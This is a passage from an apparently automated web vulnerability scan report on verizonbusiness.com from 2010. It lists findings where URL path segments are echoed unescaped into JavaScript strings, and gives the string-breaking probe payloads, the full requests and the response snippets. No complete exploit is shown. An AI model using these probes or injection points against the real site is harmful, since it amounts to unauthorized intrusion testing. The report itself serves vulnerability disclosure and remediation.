Last-Modified: Wed, 17 Nov 2010 00:48:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/wireless-devicesd9615';2d9eec93f80/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.221. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71c7e"%3b0e5d8892147 was submitted in the REST URL parameter 1. This input was echoed as 71c7e";0e5d8892147 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products71c7e"%3b0e5d8892147/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:44:21 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products71c7e";0e5d8892147/networking/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.222. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93e75'%3b9df3f74ce44 was submitted in the REST URL parameter 1. This input was echoed as 93e75';9df3f74ce44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products93e75'%3b9df3f74ce44/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:27 GMT
Content-Type: text/html
Content-Length: 40638
Date: Wed, 17 Nov 2010 00:44:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products93e75';9df3f74ce44/networking/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.223. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f49c7'%3b3913a7f4d4a was submitted in the REST URL parameter 2. This input was echoed as f49c7';3913a7f4d4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingf49c7'%3b3913a7f4d4a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42305
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingf49c7';3913a7f4d4a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.224. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8eb"%3bea880fc7b5 was submitted in the REST URL parameter 2. This input was echoed as be8eb";ea880fc7b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingbe8eb"%3bea880fc7b5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42301
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingbe8eb";ea880fc7b5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.225. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df75'%3b2033e1e27fa was submitted in the REST URL parameter 1. This input was echoed as 9df75';2033e1e27fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9df75'%3b2033e1e27fa/networking/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products9df75';2033e1e27fa/networking/access/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.226. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ad91"%3b05112381dc2 was submitted in the REST URL parameter 1. This input was echoed as 7ad91";05112381dc2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7ad91"%3b05112381dc2/networking/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products7ad91";05112381dc2/networking/access/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.227. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cba27'%3bc7cab3e456 was submitted in the REST URL parameter 2. This input was echoed as cba27';c7cab3e456 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingcba27'%3bc7cab3e456/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingcba27';c7cab3e456/access/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.228. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eea84"%3bb0aa480eb99 was submitted in the REST URL parameter 2. This input was echoed as eea84";b0aa480eb99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingeea84"%3bb0aa480eb99/access/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingeea84";b0aa480eb99/access/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.229. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a410"%3b13fa2fcc469 was submitted in the REST URL parameter 3. This input was echoed as 8a410";13fa2fcc469 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/access8a410"%3b13fa2fcc469/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/access8a410";13fa2fcc469/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.230. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/access/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fef7'%3b4cfbb2f24a9 was submitted in the REST URL parameter 3. This input was echoed as 4fef7';4cfbb2f24a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/access4fef7'%3b4cfbb2f24a9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/access4fef7';4cfbb2f24a9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.231. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ed3a"%3b1481fe7d081 was submitted in the REST URL parameter 1. This input was echoed as 1ed3a";1481fe7d081 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1ed3a"%3b1481fe7d081/networking/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products1ed3a";1481fe7d081/networking/internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.232. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7675e'%3b3ca23e0c757 was submitted in the REST URL parameter 1. This input was echoed as 7675e';3ca23e0c757 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7675e'%3b3ca23e0c757/networking/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:45 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products7675e';3ca23e0c757/networking/internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.233. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3caf0"%3b22325909194 was submitted in the REST URL parameter 2. This input was echoed as 3caf0";22325909194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking3caf0"%3b22325909194/internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
